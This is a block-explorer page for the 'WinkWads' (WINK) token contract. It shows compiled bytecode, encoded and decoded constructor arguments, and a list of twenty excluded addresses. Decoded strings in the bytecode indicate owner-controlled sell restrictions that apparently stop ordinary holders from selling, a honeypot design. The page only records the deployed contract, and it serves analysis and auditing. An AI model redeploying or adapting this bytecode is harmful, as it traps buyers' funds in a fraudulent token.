0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063665a11ca116100a257806395d89b411161007157806395d89b4114610257578063a457c2d71461025f578063a9059cbb14610272578063a9e7c0f414610285578063dd62ed3e1461029857600080fd5b8063665a11ca146101f057806370a08231146102085780637cff3fa8146102315780638da5cb5b1461024457600080fd5b806323b872dd116100e957806323b872dd146101835780632f4c467814610196578063313ce567146101c157806339509351146101d057806348d77917146101e357600080fd5b8063018770201461011b57806306fdde0314610130578063095ea7b31461014e57806318160ddd14610171575b600080fd5b61012e610129366004610a8e565b6102ab565b005b61013861033b565b6040516101459190610ab0565b60405180910390f35b61016161015c366004610afe565b6103cd565b6040519015158152602001610145565b6002545b604051908152602001610145565b610161610191366004610b28565b6103e7565b6101a96101a4366004610b65565b61046b565b6040516001600160a01b039091168152602001610145565b60405160128152602001610145565b6101616101de366004610afe565b610495565b6007546101619060ff1681565b6007546101a99061010090046001600160a01b031681565b610175610216366004610a8e565b6001600160a01b031660009081526020819052604090205490565b61012e61023f366004610b7e565b6104b7565b6008546101a9906001600160a01b031681565b610138610522565b61016161026d366004610afe565b610531565b610161610280366004610afe565b6105b7565b6005546101a9906001600160a01b031681565b6101756102a6366004610ba0565b610621565b6008546001600160a01b031633146102de5760405162461bcd60e51b81526004016102d590610bd3565b60405180910390fd5b60078054610100600160a81b0319166101006001600160a01b038416908102919091179091556040519081527fe57f71636571365571c0eaeaeb54e1d9e0065804f056a57a2a29448524f7d18a906020015b60405180910390a150565b60606003805461034a90610c14565b80601f016020809104026020016040519081016040528092919081815260200182805461037690610c14565b80156103c35780601f10610398576101008083540402835291602001916103c3565b820191906000526020600020905b8154815290600101906020018083116103a657829003601f168201915b5050505050905090565b6000336103db81858561064c565b60019150505b92915050565b6000806103f385610770565b8061040b57506008546001600160a01b038681169116145b60075490915061010081046001600160a01b03908116908716149060ff1615806104325750815b8061043a5750805b6104565760405162461bcd60e51b81526004016102d590610c4e565b61046186868661082d565b9695505050505050565b6006818154811061047b57600080fd5b6000918252602090912001546001600160a01b0316905081565b6000336103db8185856104a88383610621565b6104b29190610cb9565b61064c565b6008546001600160a01b031633146104e15760405162461bcd60e51b81526004016102d590610bd3565b6007805460ff19168215159081179091556040519081527fe1e05f8608a3aa686fa8e136a92a94b35d2971078f20ecacbf75e892a029a63890602001610330565b60606004805461034a90610c14565b6000338161053f8286610621565b90508381101561059f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016102d5565b6105ac828686840361064c565b506001949350505050565b6000806105c333610770565b806105e157506008546001600160a01b0316336001600160a01b0316145b60075490915060ff1615806105f35750805b61060f5760405162461bcd60e51b81526004016102d590610c4e565b6106198484610846565b949350505050565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166106ae5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016102d5565b6001600160a01b03821661070f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016102d5565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546000906001600160a01b039081169083160361079157506001919050565b6007546001600160a01b03838116610100909204161480156107c2575060075461010090046001600160a01b031615155b156107cf57506001919050565b60005b60065481101561082457826001600160a01b0316600682815481106107f9576107f9610cda565b6000918252602090912001546001600160a01b03160361081c5750600192915050565b6001016107d2565b50600092915050565b60003361083b858285610854565b6105ac8585856108ce565b6000336103db8185856108ce565b60006108608484610621565b905060001981146108c857818110156108bb5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016102d5565b6108c8848484840361064c565b50505050565b6001600160a01b0383166109325760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016102d5565b6001600160a01b0382166109945760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016102d5565b6001600160a01b03831660009081526020819052604090205481811015610a0c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016102d5565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108c8565b80356001600160a01b0381168114610a8957600080fd5b919050565b600060208284031215610aa057600080fd5b610aa982610a72565b9392505050565b602081526000825180602084015260005b81811015610ade5760208186018101516040868401015201610ac1565b506000604082850101526040601f19601f83011684010191505092915050565b60008060408385031215610b1157600080fd5b610b1a83610a72565b946020939093013593505050565b600080600060608486031215610b3d57600080fd5b610b4684610a72565b9250610b5460208501610a72565b929592945050506040919091013590565b600060208284031215610b7757600080fd5b5035919050565b600060208284031215610b9057600080fd5b81358015158114610aa957600080fd5b60008060408385031215610bb357600080fd5b610bbc83610a72565b9150610bca60208401610a72565b90509250929050565b60208082526021908201527f4f6e6c79206f776e65722063616e2063616c6c20746869732066756e6374696f6040820152603760f91b606082015260800190565b600181811c90821680610c2857607f821691505b602082108103610c4857634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526045908201527f596f75206861766520746f20627579206d6f726520746f6b656e7320746f206260408201527f652061626c6520746f2073656c6c20616c6c20616d6f756e742e205468616e6b60608201526420796f752160d81b608082015260a00190565b808201808211156103e157634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fdfea2646970667358221220dc18e307444bfd3e3ce1f49e72236ce96823a4e0358e716ea04a424d3162d47264736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000001701e480000000000000000000000000feb72ad991bc20d902c46c97a9ff3c6d23aed11a0000000000000000000000000000000000000000000000000000000000000120000000000000000000000000000000000000000000000000000000000000000857696e6b57616473000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000457494e4b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000140000000000000000000000002a6907df19a58956a15be8ab581fef024bc25569000000000000000000000000a49525ffe1b45af57924d583d8689cb99e488448000000000000000000000000962a7ea7b86ba5d71c0c41984cb1d8d059e21e6b000000000000000000000000fe96ade32d7407c8d8c8ef25ecc558cf4744934f0000000000000000000000009d3c725186fcc40202607cec135679b5e8be43b80000000000000000000000005a0311015f3a43cd48a61c07f4d190868f4e7c11000000000000000000000000d5ffa812f8de1b6851faffccccbd2f903638da8d000000000000000000000000edfb8a9f2008690113d9e850eb8d148e37ce8e5b0000000000000000000000003d30ce81c678c69c15586cc49fa099eb0ddbfe140000000000000000000000004254696d7ba52ed730d6396b35e78ef4961ed3dc00000000000000000000000070a508c552a6817bbfa660073968b5c66cb367640000000000000000000000003de53f6e7e3b992501574a387f4852e8d96015de0000000000000000000000008a47bf090a2e878627e1f7546858359f1952d1730000000000000000000000001143050d3d28d3c2d34bee8af65502db8f17b7850000000000000000000000000ff54e4214fbdb8082f97a5afbb957a82a31b036000000000000000000000000e0020a8100c509d75258cfe5ba30593561c69dbe000000000000000000000000682f39fc0f3c4c3a4f97966ee7c99e4855709619000000000000000000000000c16a62710b9e743d591474741a43e51044b01e1e000000000000000000000000c4dfec41d1c551d68fcf9693aa819539e0df1d4b00000000000000000000000014a3582c37a3647bb1d3f5827d3a2c54e60d0295
-----Decoded View---------------
Arg [0] : name (string): WinkWads
Arg [1] : symbol (string): WINK
Arg [2] : initialSupply (uint256): 386000000
Arg [3] : _exceptionAddress (address): 0xFeB72Ad991BC20D902C46c97A9ff3c6d23AEd11a
Arg [4] : _excludedAddresses (address[]): 0x2A6907df19A58956A15bE8AB581fEf024BC25569,0xa49525Ffe1B45af57924D583d8689cB99E488448,0x962a7eA7b86bA5d71c0c41984Cb1d8d059E21E6b,0xfE96aDE32d7407C8d8C8EF25eCc558Cf4744934f,0x9D3C725186fCc40202607ceC135679B5e8bE43B8,0x5a0311015F3a43cD48A61C07F4d190868f4e7C11,0xd5FfA812f8dE1B6851FAfFCCCCBd2f903638da8d,0xedFB8a9F2008690113d9E850Eb8d148E37Ce8E5B,0x3d30ce81C678C69C15586cC49FA099Eb0ddbfE14,0x4254696d7BA52Ed730d6396b35e78eF4961ed3dc,0x70a508c552A6817BBFA660073968b5c66cB36764,0x3De53F6E7e3B992501574a387F4852E8D96015dE,0x8a47bF090A2E878627e1F7546858359f1952D173,0x1143050D3D28D3c2D34BEe8af65502Db8f17B785,0x0Ff54e4214fBDB8082F97a5afBB957A82a31b036,0xe0020A8100c509d75258CFe5Ba30593561c69DbE,0x682f39Fc0F3c4c3a4f97966EE7C99e4855709619,0xC16a62710B9e743d591474741a43E51044B01e1e,0xC4DfEc41D1C551D68fCf9693AA819539E0dF1d4B,0x14a3582C37a3647bB1D3f5827D3A2C54E60d0295
-----Encoded View---------------
30 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 000000000000000000000000000000000000000000000000000000001701e480
Arg [3] : 000000000000000000000000feb72ad991bc20d902c46c97a9ff3c6d23aed11a
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000120
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [6] : 57696e6b57616473000000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [8] : 57494e4b00000000000000000000000000000000000000000000000000000000
Arg [9] : 0000000000000000000000000000000000000000000000000000000000000014
Arg [10] : 0000000000000000000000002a6907df19a58956a15be8ab581fef024bc25569
Arg [11] : 000000000000000000000000a49525ffe1b45af57924d583d8689cb99e488448
Arg [12] : 000000000000000000000000962a7ea7b86ba5d71c0c41984cb1d8d059e21e6b
Arg [13] : 000000000000000000000000fe96ade32d7407c8d8c8ef25ecc558cf4744934f
Arg [14] : 0000000000000000000000009d3c725186fcc40202607cec135679b5e8be43b8
Arg [15] : 0000000000000000000000005a0311015f3a43cd48a61c07f4d190868f4e7c11
Arg [16] : 000000000000000000000000d5ffa812f8de1b6851faffccccbd2f903638da8d
Arg [17] : 000000000000000000000000edfb8a9f2008690113d9e850eb8d148e37ce8e5b
Arg [18] : 0000000000000000000000003d30ce81c678c69c15586cc49fa099eb0ddbfe14
Arg [19] : 0000000000000000000000004254696d7ba52ed730d6396b35e78ef4961ed3dc
Arg [20] : 00000000000000000000000070a508c552a6817bbfa660073968b5c66cb36764
Arg [21] : 0000000000000000000000003de53f6e7e3b992501574a387f4852e8d96015de
Arg [22] : 0000000000000000000000008a47bf090a2e878627e1f7546858359f1952d173
Arg [23] : 0000000000000000000000001143050d3d28d3c2d34bee8af65502db8f17b785
Arg [24] : 0000000000000000000000000ff54e4214fbdb8082f97a5afbb957a82a31b036
Arg [25] : 000000000000000000000000e0020a8100c509d75258cfe5ba30593561c69dbe
Arg [26] : 000000000000000000000000682f39fc0f3c4c3a4f97966ee7c99e4855709619
Arg [27] : 000000000000000000000000c16a62710b9e743d591474741a43e51044b01e1e
Arg [28] : 000000000000000000000000c4dfec41d1c551d68fcf9693aa819539e0df1d4b
Arg [29] : 00000000000000000000000014a3582c37a3647bb1d3f5827d3a2c54e60d0295
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.
Add Token to MetaMask (Web3)